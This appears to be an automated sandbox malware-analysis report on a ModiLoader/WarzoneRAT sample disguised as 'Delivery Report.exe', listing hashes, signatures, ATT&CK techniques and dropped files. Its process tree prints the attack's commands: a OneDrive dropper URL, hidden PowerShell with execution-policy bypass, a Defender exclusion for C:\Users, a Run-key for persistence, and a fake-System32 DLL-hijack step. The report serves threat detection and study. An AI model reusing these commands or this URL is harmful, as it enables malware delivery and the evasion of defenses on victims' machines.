modiloader | 97c54d93ac31bbe3462242b5714804042342e581416c67b77dfd7494f77367b2

Analysis

max time kernel
143s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2022 15:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Delivery Report.exe
Size

854KB
MD5

8eca9c1d1031a98dc5f7900c31707473
SHA1

a7a03da58b79d7d39a3705e1bba5e4a4aeb850ec
SHA256

97c54d93ac31bbe3462242b5714804042342e581416c67b77dfd7494f77367b2
SHA512

f2064609d8d957d063ce06bf7fef308ea00a8cfc3e02d7250e8b23fa39ddcf3d627963367826306b3db544b7926f7528aa6f82d5ae8747d1798a14a8250ad2b7
SSDEEP

12288:zZ927jdTn4YRkAvIHenu/JdgQbug0lUxa66kXUqTfTB2O4rwSMpxA6Fs2Cz1dqX:zZU7VxRkwPusKAbpq7oOqLMfF8q

Score

10^/10

modiloader warzonerat infostealer persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://onedrive.live.com/download?cid=EDCA24AC9B2BDA50&resid=EDCA24AC9B2BDA50%21121&authkey=AOCroWgFIgHS9Kc

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3656-132-0x00000000028C0000-0x00000000028EC000-memory.dmp	modiloader_stage2

Warzone RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4984-173-0x0000000010680000-0x00000000107EB000-memory.dmp	warzonerat
behavioral2/memory/4984-174-0x0000000000400000-0x0000000000569000-memory.dmp	warzonerat
behavioral2/memory/4984-175-0x0000000000400000-0x0000000000569000-memory.dmp	warzonerat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

12 1456 powershell.exe
14 1456 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

easinvoker.exe

pid process

4396 easinvoker.exe
Loads dropped DLL 1 IoCs

Processes:

easinvoker.exe

pid process

4396 easinvoker.exe

flow	pid	process
12	1456	powershell.exe
14	1456	powershell.exe

pid	process
4396	easinvoker.exe

pid	process
4396	easinvoker.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Delivery Report.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sexctvht = "C:\\Users\\Public\\Libraries\\thvtcxeS.url"	Delivery Report.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2664 PING.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exeDelivery Report.exe

pid process

1456 powershell.exe
1456 powershell.exe
4484 powershell.exe
4484 powershell.exe
3656 Delivery Report.exe
3656 Delivery Report.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1456 powershell.exe
Token: SeDebugPrivilege 4484 powershell.exe

pid	process
2664	PING.EXE

pid	process
1456	powershell.exe
1456	powershell.exe
4484	powershell.exe
4484	powershell.exe
3656	Delivery Report.exe
3656	Delivery Report.exe

description	pid	process
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

Delivery Report.execmd.execmd.exeeasinvoker.execmd.exe

description	pid	process	target process
PID 3656 wrote to memory of 2984	3656	Delivery Report.exe	cmd.exe
PID 3656 wrote to memory of 2984	3656	Delivery Report.exe	cmd.exe
PID 3656 wrote to memory of 2984	3656	Delivery Report.exe	cmd.exe
PID 2984 wrote to memory of 1456	2984	cmd.exe	powershell.exe
PID 2984 wrote to memory of 1456	2984	cmd.exe	powershell.exe
PID 2984 wrote to memory of 1456	2984	cmd.exe	powershell.exe
PID 3656 wrote to memory of 2160	3656	Delivery Report.exe	cmd.exe
PID 3656 wrote to memory of 2160	3656	Delivery Report.exe	cmd.exe
PID 3656 wrote to memory of 2160	3656	Delivery Report.exe	cmd.exe
PID 2160 wrote to memory of 4216	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4216	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4216	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4188	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4188	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4188	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4536	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4536	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4536	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4568	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4568	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4568	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4208	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4208	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4208	2160	cmd.exe	cmd.exe
PID 2160 wrote to memory of 4676	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4676	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4676	2160	cmd.exe	xcopy.exe
PID 2160 wrote to memory of 4396	2160	cmd.exe	easinvoker.exe
PID 2160 wrote to memory of 4396	2160	cmd.exe	easinvoker.exe
PID 4396 wrote to memory of 3448	4396	easinvoker.exe	cmd.exe
PID 4396 wrote to memory of 3448	4396	easinvoker.exe	cmd.exe
PID 2160 wrote to memory of 2664	2160	cmd.exe	PING.EXE
PID 2160 wrote to memory of 2664	2160	cmd.exe	PING.EXE
PID 2160 wrote to memory of 2664	2160	cmd.exe	PING.EXE
PID 3448 wrote to memory of 4484	3448	cmd.exe	powershell.exe
PID 3448 wrote to memory of 4484	3448	cmd.exe	powershell.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe
PID 3656 wrote to memory of 4984	3656	Delivery Report.exe	colorcpl.exe

C:\Users\Admin\AppData\Local\Temp\Delivery Report.exe
"C:\Users\Admin\AppData\Local\Temp\Delivery Report.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\png.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2984
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -FILE C:\Users\Public\Libraries\png.ps1
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\SexctvhtO.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
    3⤵
    - Enumerates system info in registry
    PID:4188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
    3⤵
    - Enumerates system info in registry
    PID:4568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
    3⤵
    - Enumerates system info in registry
    PID:4676
- - C:\Windows \System32\easinvoker.exe
    "C:\Windows \System32\easinvoker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3448
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4484
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 6
    3⤵
    - Runs ping.exe
    PID:2664
- C:\Windows\SysWOW64\colorcpl.exe
  C:\Windows\System32\colorcpl.exe
  2⤵
  PID:4984

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
5d7d0d6d231885bec88ecca237911b8d

SHA1
091f9d55a0767595f49bd99099980c79c9369c59

SHA256
7a7b58cb9d6c1e72dc21f2b05306c77d087e462e93458d3bf8e793cf050887b0

SHA512
ca3069e524e519d0fe86deb94fcd90e6fc22e95176b1e421b9292b132710b706c62ac6424b3e03c7e09dc58fd896fc51e45865110d262281c4488fe746d63606

Download Submit
C:\Users\Public\Libraries\KDECO.bat

Filesize
155B

MD5
213c60adf1c9ef88dc3c9b2d579959d2

SHA1
e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021

SHA256
37c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e

SHA512
fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7

Download Submit
C:\Users\Public\Libraries\SexctvhtO.bat

Filesize
411B

MD5
55aba243e88f6a6813c117ffe1fa5979

SHA1
210b9b028a4b798c837a182321dbf2e50d112816

SHA256
5a11c5641c476891aa30e7ecfa57c2639f6827d8640061f73e9afec0adbbd7d2

SHA512
68009c4c9bbea75a3bfa9f79945d30957a95691ea405d031b4ca7f1cb47504bbc768fcae59173885743ad4d6cfdd2313c3fe0acb515e34e5c809ecdc7f45e307

Download Submit
C:\Users\Public\Libraries\easinvoker.exe

Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
C:\Users\Public\Libraries\netutils.dll

Filesize
108KB

MD5
a800effc5290ed4d6869ee2fe0acb96c

SHA1
08b9a4a6e84c99670e08fd0a0036790cd09d5c00

SHA256
8fcee46630ac35d7757a30701098b23c00e6ee80eafa836c71a23312826f7963

SHA512
aa2526533e0b8408445a9af3cd29f67c4d5313281de76227951741b67ce21caf47c9775e0c79b663ea6187c6891a587ed6fe51a8fd61f65193da69cc2ba4a654

Download Submit
C:\Users\Public\Libraries\png

Filesize
431KB

MD5
91c480500fdb36cd38947a3d306ab1a3

SHA1
ca7d45d3808892999ed67d755bb54059d7e0401c

SHA256
629917c47ae083975f0466250ae0488dacedb0ccf065b23d275fe0f363b7e96d

SHA512
9ea72ce543228b6e960eb87053233c6f0ac89bb2a71fb2d26e0ae1cba1e0c5079798b38655dca98925472bbf547bcde4b6d713c7ea057dad8dc4058dfac53dba

Download Submit
C:\Users\Public\Libraries\png.bat

Filesize
100B

MD5
c385a71887d828b1df961942e68ecfe8

SHA1
3f539a56267af3db91be9ac9ea2fd5d803a53279

SHA256
bcd9e416bc017b7f079e7daee3b628ccdcf34cfb93d1d131f0d11ee2ba3498f3

SHA512
83d48fa5c8d06918fe63404500f35231f461dd7ce57540d9f9c36b0fcc81a15e02f28e5aa66acdf2183ce95acd2f301e3d5963c10e2bc298c93dab87e9d90848

Download Submit
C:\Users\Public\Libraries\png.ps1

Filesize
241B

MD5
ac1291e283ac1c7399ae1004ac25e6fa

SHA1
9ed163c4eec546fccf75edd8bd99442b89058a66

SHA256
a3fff36ae666cab320cf5893312e264c24d38e04f1b909c0b66e85c507a20391

SHA512
671f90823b4d99beb33f4376c04c270533b26f3645458e7f39e8d3ff64a04d0030be4d3aa0f4808921cda1ba26d193460281ff9573d0f210476cc0f49b413ffc

Download Submit
C:\Windows \System32\easinvoker.exe

Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
C:\Windows \System32\easinvoker.exe

Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
C:\Windows \System32\netutils.dll

Filesize
108KB

MD5
a800effc5290ed4d6869ee2fe0acb96c

SHA1
08b9a4a6e84c99670e08fd0a0036790cd09d5c00

SHA256
8fcee46630ac35d7757a30701098b23c00e6ee80eafa836c71a23312826f7963

SHA512
aa2526533e0b8408445a9af3cd29f67c4d5313281de76227951741b67ce21caf47c9775e0c79b663ea6187c6891a587ed6fe51a8fd61f65193da69cc2ba4a654

Download Submit
C:\Windows \System32\netutils.dll

Filesize
108KB

MD5
a800effc5290ed4d6869ee2fe0acb96c

SHA1
08b9a4a6e84c99670e08fd0a0036790cd09d5c00

SHA256
8fcee46630ac35d7757a30701098b23c00e6ee80eafa836c71a23312826f7963

SHA512
aa2526533e0b8408445a9af3cd29f67c4d5313281de76227951741b67ce21caf47c9775e0c79b663ea6187c6891a587ed6fe51a8fd61f65193da69cc2ba4a654

Download Submit
C:\windows \system32\KDECO.bat

Filesize
155B

MD5
213c60adf1c9ef88dc3c9b2d579959d2

SHA1
e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021

SHA256
37c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e

SHA512
fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7

Download Submit
memory/1456-139-0x00000000057D0000-0x00000000057F2000-memory.dmp

Filesize
136KB

Download
memory/1456-145-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

Filesize
104KB

Download
memory/1456-144-0x0000000007F00000-0x000000000857A000-memory.dmp

Filesize
6.5MB

Download
memory/1456-142-0x00000000066B0000-0x00000000066CE000-memory.dmp

Filesize
120KB

Download
memory/1456-141-0x00000000060A0000-0x0000000006106000-memory.dmp

Filesize
408KB

Download
memory/1456-140-0x0000000005FC0000-0x0000000006026000-memory.dmp

Filesize
408KB

Download
memory/1456-138-0x00000000058A0000-0x0000000005EC8000-memory.dmp

Filesize
6.2MB

Download
memory/1456-137-0x00000000050C0000-0x00000000050F6000-memory.dmp

Filesize
216KB

Download
memory/1456-136-0x0000000000000000-mapping.dmp

Download
memory/2160-147-0x0000000000000000-mapping.dmp

Download
memory/2664-164-0x0000000000000000-mapping.dmp

Download
memory/2984-134-0x0000000000000000-mapping.dmp

Download
memory/3448-163-0x0000000000000000-mapping.dmp

Download
memory/3656-171-0x0000000010680000-0x00000000107EB000-memory.dmp

Filesize
1.4MB

Download
memory/3656-172-0x0000000010680000-0x00000000107EB000-memory.dmp

Filesize
1.4MB

Download
memory/3656-132-0x00000000028C0000-0x00000000028EC000-memory.dmp

Filesize
176KB

Download
memory/4188-150-0x0000000000000000-mapping.dmp

Download
memory/4208-155-0x0000000000000000-mapping.dmp

Download
memory/4216-149-0x0000000000000000-mapping.dmp

Download
memory/4396-158-0x0000000000000000-mapping.dmp

Download
memory/4484-169-0x00007FFF67CF0000-0x00007FFF687B1000-memory.dmp

Filesize
10.8MB

Download
memory/4484-166-0x0000000000000000-mapping.dmp

Download
memory/4484-167-0x000002D6B35C0000-0x000002D6B35E2000-memory.dmp

Filesize
136KB

Download
memory/4536-152-0x0000000000000000-mapping.dmp

Download
memory/4568-153-0x0000000000000000-mapping.dmp

Download
memory/4676-156-0x0000000000000000-mapping.dmp

Download
memory/4984-170-0x0000000000000000-mapping.dmp

Download
memory/4984-173-0x0000000010680000-0x00000000107EB000-memory.dmp

Filesize
1.4MB

Download
memory/4984-174-0x0000000000400000-0x0000000000569000-memory.dmp

Filesize
1.4MB

Download
memory/4984-175-0x0000000000400000-0x0000000000569000-memory.dmp

Filesize
1.4MB

Download